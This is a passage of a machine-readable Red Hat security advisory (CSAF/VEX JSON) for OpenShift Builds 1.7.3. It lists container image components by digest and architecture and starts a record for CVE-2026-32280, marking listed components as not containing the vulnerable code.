"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:c176b6a935420ca95e609241c03c3d4fc1beca73f1e8e3b6c45f7bb27c9c775e_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:503492d3bab8d86f320aca4850c732f7497655b3bb73d6e82031f8c5e592fec1_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:cbc806ef024057021397991e60becb5f19f85831d131ff7fe9cbdf967d15217c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:d1733e18d64f81a3b24e145fcd7612e050faeb53e209018b1454d72d3d84c73b_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-rhel9@sha256:f4431461400983fa84667867de5ae0fd254e89c0924c5135440bfe49f53c2c5a_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:0436a253c41145169babd1378dfa9215748133fd2ab69d31bd0f173301476e1c_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:a406fa897dfbf19b06a540ab504d774dcd6ab96a821e525771c04c894032ae49_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:dce347a369087dcc0584821af5924fa627d9f00bf3eba5fe8cf94d1dba404ff4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-shared-resource-webhook-rhel9@sha256:e1da05467b3e168877435d5c5fff498844793476a4e93e9a0945ea07bd243475_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:14eadfc84ff3891dc935eee3c9553a2c2c7f1b446a123feb02df8f4dff18638f_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2255b1556ac0b266991359df0882fdee8c6c0cc4193a2a77159db0696153020a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:2b9d139f846cf2f606be0e2498cc74473396d8da623f6b7d87e7c55c54e143d2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-waiters-rhel9@sha256:b83fb75af5101ee00f32957f1532702e3a58498330cc4d16d4d4f05ef6bd97dc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:80b9b77db840ace9ba84c3d47b081fdc812be4572d7d476a9eee4b8d446e0ae9_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:8c5090cb83361e280a8069c97252bde7d695d241fc01db975428e5f32ed180c1_arm64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:9f14cf2bbd46f58fb2f3745e8df20e3f3f6cd68395f9b9505bddb896ff900273_s390x",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64 as a component of Red Hat OpenShift Builds 1.7.3",
"product_id": "Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64"
},
"product_reference": "registry.redhat.io/openshift-builds/openshift-builds-webhook-rhel9@sha256:b2cd0295f34620305f2a8ef2ca1e07166f8c565a5162ef3717f810de638e4643_amd64",
"relates_to_product_reference": "Red Hat OpenShift Builds 1.7.3"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32280",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-04-08T02:01:19.572351+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:18f00b5d62bd5526f80dbe2cb380e677c0f84953b762b3edb41d3e380e04eaf5_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:67f18db03a40270705bffb37c866250aa2418621f0b5128ebf34d9b7ab3df803_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:a286b64da40c2fefa4e4f67249e138409395168f03028d30a2f1cf765440974d_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-controller-rhel9@sha256:dfb8f5b7d5b2a4dbd83b6585d49f53b11c439bcd2d150144edba9fc08e0fe724_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:350e159561c341a69daf928466c64cf1936d4937af62a3a0378c7dfe65949365_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:6eaac6f9f219963aac92099fcf2ab0291d5c0c68cc9070c06c1d122531349802_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:92b94a5e69841aedd2ac577ab8a286ec4ded35ffabed478fdf9ab32fdf4fbb6f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-git-cloner-rhel9@sha256:cdf06172d9ecf62be5a86eef680a6a1e1198b75a6f14c8b9cc7d52c06076d44e_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:07a5fd537dd60ddc9a05766e2c8f4d7f407b2e7914cf0f60a83b4361e934e215_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:3b9bfd2d1f0c9917c65ba84cb26182522de4be3a6e34f4aa6a092c84c97518bc_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:a2485063e14fa8478f05f8a04c1fd43d402b38f8b5a24836ff389711f51f60f9_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-bundler-rhel9@sha256:bd6d2fed0ba96d6583b796370ce0949de210ead5505e60a33204a27b3c6cde2d_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:54a6a27410eabdbbeafd4137e74c1f9312bde27fa345ec4753693ed633668472_arm64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:9bb9d6a35d2acbee9db6770e11894647b57c6c27d5a32944c21b26f382a4d6b5_ppc64le",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:ba720079d59c9b351c7b1ec156d5e3ebabeafcae862f5e86294f0563351f7b65_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-image-processing-rhel9@sha256:cc8bcc436c5e22a1a870599f673dc8cfca8a3d8970b620b8499ec78c207825bb_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-operator-bundle@sha256:fcb0d4599ec7124f8185715d681d5f3e0d7a904f4544d107c5a8294de425a89f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:351c74c3fd8d6c79909f8789d457a0e7695dc5a48da0329f0b903a8d76847d4f_s390x",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5725324b6605bd242e64288df723c0c28dde50b10a1cec48fea7486d74b5782f_amd64",
"Red Hat OpenShift Builds 1.7.3:registry.redhat.io/openshift-builds/openshift-builds-rhel9-operator@sha256:5a3ce7b8f6bb5b8e485c5efaadff958e4e356dd7e3c9fdbc608686e688703f17_ppc64le",
